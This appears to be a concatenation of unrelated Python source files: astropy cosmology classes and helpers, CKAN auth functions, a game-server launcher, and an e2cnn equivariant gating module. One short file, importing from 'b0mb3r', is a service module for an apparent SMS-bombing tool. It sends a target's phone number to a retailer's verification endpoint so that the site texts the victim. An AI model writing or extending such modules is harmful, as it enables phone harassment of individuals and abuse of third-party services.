redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, w0 = self._Om0, self._Ode0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0 * zp1 ** (3.0 * (1 + w0))) def inv_efunc(self, z): r""" Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. 
""" if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0, w0 = self._Om0, self._Ode0, self._Ok0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0 * zp1 ** (3 * (1 + w0))) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, w0={3:.3g}, Tcmb0={4:.4g}, "\ "Neff={5:.3g}, m_nu={6:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._w0, self._Tcmb0, self._Neff, self.m_nu) class w0waCDM(FLRW): """FLRW cosmology with a CPL dark energy equation of state and curvature. The equation for the dark energy equation of state uses the CPL form as described in Chevallier & Polarski Int. J. Mod. Phys. D10, 213 (2001) and Linder PRL 90, 91301 (2003): :math:`w(z) = w_0 + w_a (1-a) = w_0 + w_a z / (1+z)`. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. w0 : float Dark energy equation of state at z=0 (a=1). This is pressure/density for dark energy in units where c=1. wa : float Negative derivative of the dark energy equation of state with respect to the scale factor. A cosmological constant has w0=-1.0 and wa=0.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import w0waCDM >>> cosmo = w0waCDM(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9, wa=0.2) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, w0=-1., wa=0., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) self._wa = float(wa) @property def w0(self): """ Dark energy equation of state at z=0""" return self._w0 @property def wa(self): """ Negative derivative of dark energy equation of state w.r.t. a""" return self._wa def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = w_0 + w_a (1 - a) = w_0 + w_a \\frac{z}{1+z}`. """ if isiterable(z): z = np.asarray(z) return self._w0 + self._wa * z / (1.0 + z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. 
Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by .. math:: I = \\left(1 + z\\right)^{3 \\left(1 + w_0 + w_a\\right)} \exp \\left(-3 w_a \\frac{z}{1+z}\\right) """ if isiterable(z): z = np.asarray(z) zp1 = 1.0 + z return zp1 ** (3 * (1 + self._w0 + self._wa)) * \ np.exp(-3 * self._wa * z / zp1) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, "\ "Ode0={3:.3g}, w0={4:.3g}, wa={5:.3g}, Tcmb0={6:.4g}, "\ "Neff={7:.3g}, m_nu={8:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._w0, self._wa, self._Tcmb0, self._Neff, self.m_nu) class Flatw0waCDM(w0waCDM): """FLRW cosmology with a CPL dark energy equation of state and no curvature. The equation for the dark energy equation of state uses the CPL form as described in Chevallier & Polarski Int. J. Mod. Phys. D10, 213 (2001) and Linder PRL 90, 91301 (2003): :math:`w(z) = w_0 + w_a (1-a) = w_0 + w_a z / (1+z)`. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. w0 : float Dark energy equation of state at z=0 (a=1). This is pressure/density for dark energy in units where c=1. wa : float Negative derivative of the dark energy equation of state with respect to the scale factor. A cosmological constant has w0=-1.0 and wa=0.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import Flatw0waCDM >>> cosmo = Flatw0waCDM(H0=70, Om0=0.3, w0=-0.9, wa=0.2) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, w0=-1., wa=0., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, 0.0, Tcmb0, Neff, m_nu, name=name) # Do some twiddling after the fact to get flatness self._Ode0 = 1.0 - self._Om0 - self._Ogamma0 - self._Onu0 self._Ok0 = 0.0 self._w0 = float(w0) self._wa = float(wa) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, "\ "w0={3:.3g}, Tcmb0={4:.4g}, Neff={5:.3g}, m_nu={6:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._w0, self._Tcmb0, self._Neff, self.m_nu) class wpwaCDM(FLRW): """FLRW cosmology with a CPL dark energy equation of state, a pivot redshift, and curvature. The equation for the dark energy equation of state uses the CPL form as described in Chevallier & Polarski Int. J. Mod. Phys. D10, 213 (2001) and Linder PRL 90, 91301 (2003), but modified to have a pivot redshift as in the findings of the Dark Energy Task Force (Albrecht et al. arXiv:0901.0721 (2009)): :math:`w(a) = w_p + w_a (a_p - a) = w_p + w_a( 1/(1+zp) - 1/(1+z) )`. 
Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. wp : float Dark energy equation of state at the pivot redshift zp. This is pressure/density for dark energy in units where c=1. wa : float Negative derivative of the dark energy equation of state with respect to the scale factor. A cosmological constant has w0=-1.0 and wa=0.0. zp : float Pivot redshift -- the redshift where w(z) = wp Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import wpwaCDM >>> cosmo = wpwaCDM(H0=70,Om0=0.3,Ode0=0.7,wp=-0.9,wa=0.2,zp=0.4) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, wp=-1., wa=0., zp=0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._wp = float(wp) self._wa = float(wa) self._zp = float(zp) @property def wp(self): """ Dark energy equation of state at the pivot redshift zp""" return self._wp @property def wa(self): """ Negative derivative of dark energy equation of state w.r.t. a""" return self._wa @property def zp(self): """ The pivot redshift, where w(z) = wp""" return self._zp def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = w_p + w_a (a_p - a)` where :math:`a = 1/1+z` and :math:`a_p = 1 / 1 + z_p`. """ if isiterable(z): z = np.asarray(z) apiv = 1.0 / (1.0 + self._zp) return self._wp + self._wa * (apiv - 1.0 / (1. + z)) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by .. 
math:: a_p = \\frac{1}{1 + z_p} I = \\left(1 + z\\right)^{3 \\left(1 + w_p + a_p w_a\\right)} \exp \\left(-3 w_a \\frac{z}{1+z}\\right) """ if isiterable(z): z = np.asarray(z) zp1 = 1.0 + z apiv = 1.0 / (1.0 + self._zp) return zp1 ** (3 * (1 + self._wp + apiv * self._wa)) * \ np.exp(-3 * self._wa * z / zp1) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, wp={4:.3g}, "\ "wa={5:.3g}, zp={6:.3g}, Tcmb0={7:.4g}, Neff={8:.3g}, "\ "m_nu={9:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._wp, self._wa, self._zp, self._Tcmb0, self._Neff, self.m_nu) class w0wzCDM(FLRW): """FLRW cosmology with a variable dark energy equation of state and curvature. The equation for the dark energy equation of state uses the simple form: :math:`w(z) = w_0 + w_z z`. This form is not recommended for z > 1. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. Ok0 : float Omega curvature: equivalent curvature density in units of the critical density at z=0. w0 : float Dark energy equation of state at z=0. This is pressure/density for dark energy in units where c=1. A cosmological constant has w0=-1.0. wz : float Derivative of the dark energy equation of state with respect to z. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : float or ndarray or astropy.units.Quantity Mass of each neutrino species, in eV. If this is a float or scalar Quantity, then all neutrino species are assumed to have that mass. If a ndarray or array Quantity, then these are the values of the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import w0wzCDM >>> cosmo = w0wzCDM(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9, wz=0.2) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, w0=-1., wz=0., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) self._wz = float(wz) @property def w0(self): """ Dark energy equation of state at z=0""" return self._w0 @property def wz(self): """ Derivative of the dark energy equation of state w.r.t. z""" return self._wz def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is given by :math:`w(z) = w_0 + w_z z`. """ if isiterable(z): z = np.asarray(z) return self._w0 + self._wz * z def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. 
# Pre-defined cosmologies. This loops over the parameter sets in the
# parameters module and creates a LambdaCDM or FlatLambdaCDM instance
# with the same name as the parameter set in the current module's namespace.
# Note this assumes all the cosmologies in parameters are LambdaCDM,
# which is true at least as of this writing.

for key in parameters.available:
    par = getattr(parameters, key)
    if par['flat']:
        cosmo = FlatLambdaCDM(par['H0'], par['Om0'], Tcmb0=par['Tcmb0'],
                              Neff=par['Neff'],
                              m_nu=u.Quantity(par['m_nu'], u.eV),
                              name=key)
        cosmo.__doc__ = "%s instance of FlatLambdaCDM cosmology\n\n(from %s)" \
            % (key, par['reference'])
    else:
        cosmo = LambdaCDM(par['H0'], par['Om0'], par['Ode0'],
                          Tcmb0=par['Tcmb0'], Neff=par['Neff'],
                          m_nu=u.Quantity(par['m_nu'], u.eV), name=key)
        cosmo.__doc__ = "%s instance of LambdaCDM cosmology\n\n(from %s)" \
            % (key, par['reference'])
    setattr(sys.modules[__name__], key, cosmo)

# don't leave these variables floating around in the namespace
del key, par, cosmo


#########################################################################
# The variable below contains the current cosmology used by the
# convenience functions below and by other astropy functions if no
# cosmology is explicitly given. It can be set with set_current() and
# should be accessed using get_current().
#########################################################################


def get_cosmology_from_string(arg):
    """ Return a cosmology instance from a string.
    """
    if arg == 'no_default':
        cosmo = None
    else:
        try:
            cosmo = getattr(sys.modules[__name__], arg)
        except AttributeError:
            s = "Unknown cosmology '%s'. Valid cosmologies:\n%s" % (
                arg, parameters.available)
            raise ValueError(s)
    return cosmo

_current = get_cosmology_from_string(DEFAULT_COSMOLOGY())


def get_current():
    """ Get the current cosmology.

    If no current has been set, the WMAP9 cosmology is returned and a
    warning is given.

    Returns
    -------
    cosmo : `Cosmology` instance

    See Also
    --------
    set_current : sets the current cosmology
    """
    if _current is None:
        warnings.warn('No default cosmology has been specified, '
                      'using 9-year WMAP.', AstropyUserWarning)
        return WMAP9

    return _current


def set_current(cosmo):
    """ Set the current cosmology.

    Call this with an empty string ('') to get a list of the strings
    that map to available pre-defined cosmologies.

    .. warning::
        `set_current` is the only way to change the current cosmology at
        runtime!  The current cosmology can also be read from an option
        in the astropy configuration file when astropy.cosmology is first
        imported.  However, any subsequent changes to the cosmology
        configuration option using `ConfigurationItem.set` at run-time
        will not update the current cosmology.

    Parameters
    ----------
    cosmo : str or `Cosmology` instance
        The cosmology to use.

    See Also
    --------
    get_current : returns the currently-set cosmology
    """
    global _current
    if isinstance(cosmo, basestring):
        _current = get_cosmology_from_string(cosmo)
    elif isinstance(cosmo, Cosmology):
        _current = cosmo
    else:
        raise ValueError(
            "Argument must be a string or cosmology instance. Valid strings:"
            "\n%s" % parameters.available)
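A short usage sketch of the get_current/set_current machinery defined above. It assumes these names and the pre-defined cosmologies (e.g. WMAP9) are re-exported at the astropy.cosmology package level, as in releases of this vintage; newer astropy versions replace this interface, so treat it purely as an illustration.

# Illustrative only; relies on the older get_current/set_current API above.
from astropy import cosmology

cosmology.set_current('WMAP9')        # select a pre-defined cosmology by name
current = cosmology.get_current()
print(current.H0, current.Om0)

# A Cosmology instance can be passed instead of a string.
cosmology.set_current(cosmology.FlatLambdaCDM(H0=68, Om0=0.31))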
from ckan.common import _


def hdx_qa_dashboard_show(context, data_dict):
    return {'success': False,
            'msg': _('Only sysadmins/qa officers can view the qa dashboard')}


def hdx_qa_sdcmicro_run(context, data_dict):
    return {'success': False,
            'msg': _('Only sysadmins can run the sdc micro check')}


def hdx_qa_pii_run(context, data_dict):
    return {'success': False,
            'msg': _('Only sysadmins can run the PII check')}
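For context, a hypothetical sketch of how CKAN auth functions like the ones above are typically registered through the IAuthFunctions plugin interface; the plugin class name is invented for illustration and is not part of the original extension.

# Sketch only: wiring the auth functions above into a CKAN plugin.
import ckan.plugins as plugins


class HdxQaPlugin(plugins.SingletonPlugin):
    plugins.implements(plugins.IAuthFunctions)

    def get_auth_functions(self):
        # Map action names to the auth functions defined above.
        return {
            'hdx_qa_dashboard_show': hdx_qa_dashboard_show,
            'hdx_qa_sdcmicro_run': hdx_qa_sdcmicro_run,
            'hdx_qa_pii_run': hdx_qa_pii_run,
        }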
from koala.server import koala_host
import sample.player
import sample.account
from sample.account import *
import os

koala_host.init_server(globals().copy(), f"{os.getcwd()}/sample/app.yaml")
koala_host.use_pd()
koala_host.register_user_handler(
    RequestAccountLogin, process_gateway_account_login)
koala_host.run_server()


from b0mb3r.services.service import Service


class Ollis(Service):
    async def run(self):
        await self.post(
            "https://www.ollis.ru/gql",
            json={
                "query": 'mutation { phone(number:"%s", locale:ru) { token error { code message } } }'
                % self.formatted_phone
            },
        )


from typing import List, Tuple, Any

import numpy as np
from collections import defaultdict

from e2cnn.gspaces import *
from e2cnn.nn import FieldType
from e2cnn.nn import GeometricTensor

from ..equivariant_module import EquivariantModule
from .gated1 import GATED_ID, GATES_ID

import torch
from torch.nn import Parameter

__all__ = ["InducedGatedNonLinearity1"]


class InducedGatedNonLinearity1(EquivariantModule):
    def __init__(self, in_type, gates=None, drop_gates=True, **kwargs):
        r"""
        Induced Gated non-linearities.

        .. todo:: complete documentation!

        .. note:: Make sure all induced gate and gates have same subgroup

        Args:
            in_type (FieldType): the input field type
            gates (list, optional): list of strings specifying which field in input
                is a gate and which is a gated field
            drop_gates (bool, optional): if ``True`` (default), drop the trivial fields
                after using them to compute the gates. If ``False``, the gates are
                stacked with the gated fields in the output

        """
        assert isinstance(in_type.gspace, GeneralOnR2)

        if gates is None:
            assert len(in_type) % 2 == 0

            g = len(in_type) // 2
            gates = [GATES_ID] * g + [GATED_ID] * g

        assert len(gates) == len(in_type)

        super(InducedGatedNonLinearity1, self).__init__()

        self.space = in_type.gspace
        self.in_type = in_type

        self.drop_gates = drop_gates

        self._contiguous = {}
        _input_indices = defaultdict(lambda: [])
        _output_indices = defaultdict(lambda: [])

        self._nfields = defaultdict(int)

        self.branching = None

        for g, r in zip(gates, in_type.representations):
            if g == GATES_ID:
                assert (
                    "induced_gate" in r.supported_nonlinearities
                ), 'Error! Representation "{}" can\'t be a "gate"'.format(r.name)
            elif g == GATED_ID:
                for nl in r.supported_nonlinearities:
                    if nl.startswith("induced_gated"):
                        break
                else:
                    raise ValueError(
                        'Error! Representation "{}" does not support "gated"'
                        " non-linearity".format(r.name)
                    )
            else:
                raise ValueError('Error! "{}" type not recognized'.format(g))

        ngates = len([g for g in gates if g == GATES_ID])
        ngated = len([g for g in gates if g == GATED_ID])

        assert ngates == ngated, (
            "Error! Number of gates ({}) does not match the number of gated"
            " non-linearities required ({})".format(ngates, ngated)
        )

        quotient_size = None
        for g, r in zip(gates, in_type):
            if g == GATES_ID:
                if quotient_size is None:
                    quotient_size = r.size
                else:
                    assert r.size == quotient_size

        subfield_sizes = {}
        for g, r in zip(gates, in_type):
            if g == GATED_ID:
                subfield_size = None
                for nl in r.supported_nonlinearities:
                    if nl.startswith("induced_gated"):
                        assert subfield_size is None, (
                            "Error! The representation supports multiple "
                            "sub-fields of different sizes"
                        )
                        subfield_size = int(nl.split("_")[-1])
                        assert r.size % subfield_size == 0
                        assert r.size // subfield_size == quotient_size
                subfield_sizes[r.name] = subfield_size

        self.quotient_size = quotient_size

        if self.drop_gates:
            # only gated fields are preserved
            # therefore, the output representation is computed from the input one,
            # removing the gates
            self.out_type = in_type.index_select(
                [i for i, g in enumerate(gates) if g == GATED_ID]
            )
        else:
            self.out_type = in_type

        in_last_position = 0
        out_last_position = 0
        last_type = None

        # group fields by their type (gated or gate) and their size, check if fields
        # of the same type are contiguous and retrieve the indices of the fields
        for g, r in zip(gates, in_type.representations):
            if g == GATES_ID:
                type = g
            else:
                type = r.size, subfield_sizes[r.name]
            self._nfields[type] += 1

            if type != last_type:
                if not type in self._contiguous:
                    self._contiguous[type] = True
                else:
                    self._contiguous[type] = False
            last_type = type

            _input_indices[type] += list(
                range(in_last_position, in_last_position + r.size)
            )
            in_last_position += r.size

            if g != GATES_ID or not self.drop_gates:
                # since gates are discarded in output, the position on the output
                # fiber is shifted only when a gated field is met
                _output_indices[type] += list(
                    range(out_last_position, out_last_position + r.size)
                )
                out_last_position += r.size

        _input_indices = dict(_input_indices)
        # if self.drop_gates:
        _output_indices = dict(_output_indices)
        # else:
        #     self._output_indices = self._input_indices

        for t, contiguous in self._contiguous.items():
            if contiguous:
                # for contiguous fields, only the first and last indices are kept
                _input_indices[t] = torch.LongTensor(
                    [min(_input_indices[t]), max(_input_indices[t]) + 1]
                )
                if t != GATES_ID or not self.drop_gates:
                    _output_indices[t] = torch.LongTensor(
                        [min(_output_indices[t]), max(_output_indices[t]) + 1]
                    )
            else:
                # otherwise, transform the list of indices into a tensor
                _input_indices[t] = torch.LongTensor(_input_indices[t])

                if t != GATES_ID or not self.drop_gates:
                    _output_indices[t] = torch.LongTensor(_output_indices[t])

            # register the indices tensors as parameters of this module
            self.register_buffer("input_indices_{}".format(t), _input_indices[t])
            if t != GATES_ID or not self.drop_gates:
                self.register_buffer("output_indices_{}".format(t), _output_indices[t])

        # gates need to be distinguished from gated fields
        _gates_indices = _input_indices.pop(GATES_ID)
        self.register_buffer("gates_indices", _gates_indices)

        # build a sorted list of the fields groups, such that every time they are
        # iterated through in the same order
        self._order = sorted(_input_indices.keys())

        # the bias for the gates
        self.bias = Parameter(
            torch.randn(1, ngates, 1, 1, 1, dtype=torch.float), requires_grad=True
        )
    def forward(self, input):
        r"""
        Apply the gated non-linearity to the input feature map.

        Args:
            input (GeometricTensor): the input feature map

        Returns:
            the resulting feature map

        """
        assert isinstance(input, GeometricTensor)
        assert input.type == self.in_type

        # retrieve the gates
        if self._contiguous[GATES_ID]:
            gates = input.tensor[:, self.gates_indices[0]:self.gates_indices[1], ...]
        else:
            gates = input.tensor[:, self.gates_indices, ...]

        # retrieving only gated fields from the joint tensor is worthless
        input = input.tensor

        b, c, h, w = input.shape

        # transform the gates
        gates = torch.sigmoid(gates.view(b, -1, self.quotient_size, h, w) - self.bias)

        # build the output tensor
        output = torch.empty(
            b, self.out_type.size, h, w, dtype=torch.float, device=self.bias.device
        )

        if not self.drop_gates:
            # copy the gates in the output
            if self._contiguous[GATES_ID]:
                output[:, self.gates_indices[0]:self.gates_indices[1], ...] = gates
            else:
                output[:, self.gates_indices, ...] = gates

        next_gate = 0

        # for each field size
        for type in self._order:
            size, subfield_size = type

            # retrieve the needed gates
            g = gates[:, next_gate:next_gate + self._nfields[type], ...].view(
                b, -1, 1, h, w
            )

            input_indices = getattr(self, f"input_indices_{type}")
            output_indices = getattr(self, f"output_indices_{type}")

            if self._contiguous[type]:
                # if the fields were contiguous, we can use slicing
                output[:, output_indices[0]:output_indices[1], ...] = (
                    input[:, input_indices[0]:input_indices[1], ...].view(
                        b, -1, subfield_size, h, w
                    )
                    * g
                ).view(b, -1, h, w)
            else:
                # otherwise we have to use indexing
                output[:, output_indices, :, :] = (
                    input[:, input_indices, ...].view(b, -1, subfield_size, h, w) * g
                ).view(b, -1, h, w)

            # shift the position on the gates fiber
            next_gate += self._nfields[type]

        # wrap the result in a GeometricTensor
        return GeometricTensor(output, self.out_type)

    def evaluate_output_shape(self, input_shape):
        assert len(input_shape) == 4
        assert input_shape[1] == self.in_type.size

        b, c, hi, wi = input_shape

        return b, self.out_type.size, hi, wi

    def check_equivariance(self, atol=1e-6, rtol=1e-5):
        c = self.in_type.size

        x = torch.randn(3, c, 10, 10)
        x = GeometricTensor(x, self.in_type)

        errors = []

        for el in self.space.testing_elements:
            out1 = self(x).transform_fibers(el)
            out2 = self(x.transform_fibers(el))

            errs = (out1.tensor - out2.tensor).detach().numpy()
            errs = np.abs(errs).reshape(-1)
            print(el, errs.max(), errs.mean(), errs.var())

            assert torch.allclose(out1.tensor, out2.tensor, atol=atol, rtol=rtol), (
                'The error found during equivariance check with element "{}" is too'
                " high: max = {}, mean = {} var ={}".format(
                    el, errs.max(), errs.mean(), errs.var()
                )
            )

            errors.append((el, errs.mean()))

        return errors
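To make the gating step in forward() above concrete, here is a minimal, non-equivariant illustration using plain torch tensors: a sigmoid-transformed "gate" channel modulates a block of "gated" channels. The channel split and shapes are invented for the example; this is not the e2cnn API.

# Simplified sketch of the gating mechanism, outside of e2cnn.
import torch

b, h, w = 2, 8, 8
gate_channels, gated_channels = 3, 9          # 3 gates, each gating a 3-channel sub-field
x = torch.randn(b, gate_channels + gated_channels, h, w)

gates = torch.sigmoid(x[:, :gate_channels])                    # (b, 3, h, w)
gated = x[:, gate_channels:].view(b, gate_channels, -1, h, w)  # (b, 3, 3, h, w)

# Each gate multiplies every channel of its sub-field.
out = (gated * gates.unsqueeze(2)).view(b, gated_channels, h, w)
print(out.shape)  # torch.Size([2, 9, 8, 8])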